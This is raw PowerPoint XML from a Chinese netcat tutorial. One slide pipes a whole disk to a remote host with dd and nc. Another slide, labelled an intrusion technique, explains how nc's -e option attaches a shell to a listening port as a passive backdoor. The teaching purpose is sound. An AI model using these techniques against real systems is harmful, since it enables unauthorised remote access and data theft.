            <a:endParaRPr sz="1400" spc="6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 name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624205" y="1059815"/>
            <a:ext cx="7895590" cy="1952625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624297" y="1046766"/>
            <a:ext cx="1914585" cy="5921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2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="内容占位符 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755393" y="1633231"/>
            <a:ext cx="7774471" cy="1060450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="6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marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>假设你要把 A 主机 /dev/sda 磁盘的【原始数据】整个复制到 B 主机的 /dev/sdb 磁盘。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" spc="600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>你先在【接收端】（B 主机）运行命令（其中的 xxx 是端口号）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" spc="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矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695635" y="446207"/>
            <a:ext cx="3752730" cy="468630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>用法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695575" y="1179195"/>
            <a:ext cx="5602605" cy="408305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc -l -p xxx | dd of=/dev/sdb</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1" spc="450"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2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1782445" y="3148330"/>
            <a:ext cx="6515735" cy="412750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dd if=/dev/sda | nc x.x.x.x xxx</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="9" grpId="0"/>
      <p:bldP spid="17" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="2"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直角三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1273629"/>
            <a:ext cx="6836228" cy="3869871"/>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书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3268980" y="961390"/>
            <a:ext cx="5490845" cy="4067810"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="600">
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>假设 1：你使用的浏览器存在某个安全漏洞，并且该漏洞会让攻击者获得【执行代码】的机会。  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>假设 2：你在某个公共场合使用某个 wifi 热点上网。遗憾的是，这个热点是攻击者设置的陷阱。  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>假设 3：设置该陷阱的攻击者，正好也知道：如何利用上述漏洞。  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>当这三个假设都成立，攻击者就可以获得在你【本机】执行代码的机会。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="786130" y="446405"/>
            <a:ext cx="7358380" cy="868680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>招数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：（入侵手法）用 nc 开启【被动】连接型后门</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="5"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nector: Elbow 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4546594" y="-1074993"/>
            <a:ext cx="13621" cy="5291815"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4675046"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="0F1D38"/>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 name="Connector: Elbow 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4572628" y="1156632"/>
            <a:ext cx="13621" cy="5291815"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4595125"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="0F1D38"/>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îś1íḓè"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="1897781"/>
            <a:ext cx="1446490" cy="1446462"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln w="15875">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="iṧlîḑe"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7013385" y="1897515"/>
            <a:ext cx="1447047" cy="1447018"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:solidFill>
          <a:ln w="15875">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="îṧḷidê"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7500992" y="2111506"/>
            <a:ext cx="501422" cy="501413"/>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bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="îṧḷîḍè"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1156102" y="2111506"/>
            <a:ext cx="501422" cy="501413"/>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chemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="779979" y="2747747"/>
            <a:ext cx="1253667" cy="345440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d contourW="12700"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7110074" y="2747747"/>
            <a:ext cx="1253667" cy="345440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d contourW="12700"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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3635977" y="747162"/>
            <a:ext cx="1874458" cy="345440"/>
            <a:chOff x="3623277" y="1285986"/>
            <a:chExt cx="1874458" cy="345440"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="išḷïḑè"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3623277" y="1292078"/>
              <a:ext cx="1874458" cy="334065"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="3175">
              <a:noFill/>
              <a:prstDash val="sysDash"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr>
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="文本框 39"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3782047" y="1285986"/>
              <a:ext cx="1556919" cy="345440"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
              <a:spAutoFit/>
              <a:scene3d>
                <a:camera prst="orthographicFront"/>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
              <a:sp3d contourW="12700"/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>被动</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>入侵原理</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13" name="文本框 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2051532" y="1204105"/>
            <a:ext cx="5080132" cy="2976880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d contourW="12700"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="225" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>为了让后门能工作，通常会使用 nc 的 `-e` 选项，该选项的 “选项值” 是一个可执行文件的路径。  </a:t>
            </a:r>
            <a:endParaRPr sz="1400" spc="225" dirty="0">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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="225" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>设置了该选项之后，当处于监听状态的 nc 接受到某个连接，会启动 “选项值” 对应的可执行文件（并得到某个进程），nc 会把该进程的 “标准输入输出” 与网络通讯【对接】。  </a:t>
            </a:r>
            <a:endParaRPr sz="1400" spc="225" dirty="0">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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="225" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在这种情况下（nc 挂载 shell），攻击者远程连入 nc 的端口，就可以直接在这个 shell 上进行各种操作，其效果类似于 SSH 或（老式的）telnet。</a:t>
            </a:r>
            <a:endParaRPr sz="1400" spc="225"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bldLst>
      <p:bldP spid="8" grpId="0"/>
      <p:bldP spid="9" grpId="0"/>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24205" y="3075940"/>
            <a:ext cx="7879715" cy="1922145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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内容占位符 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
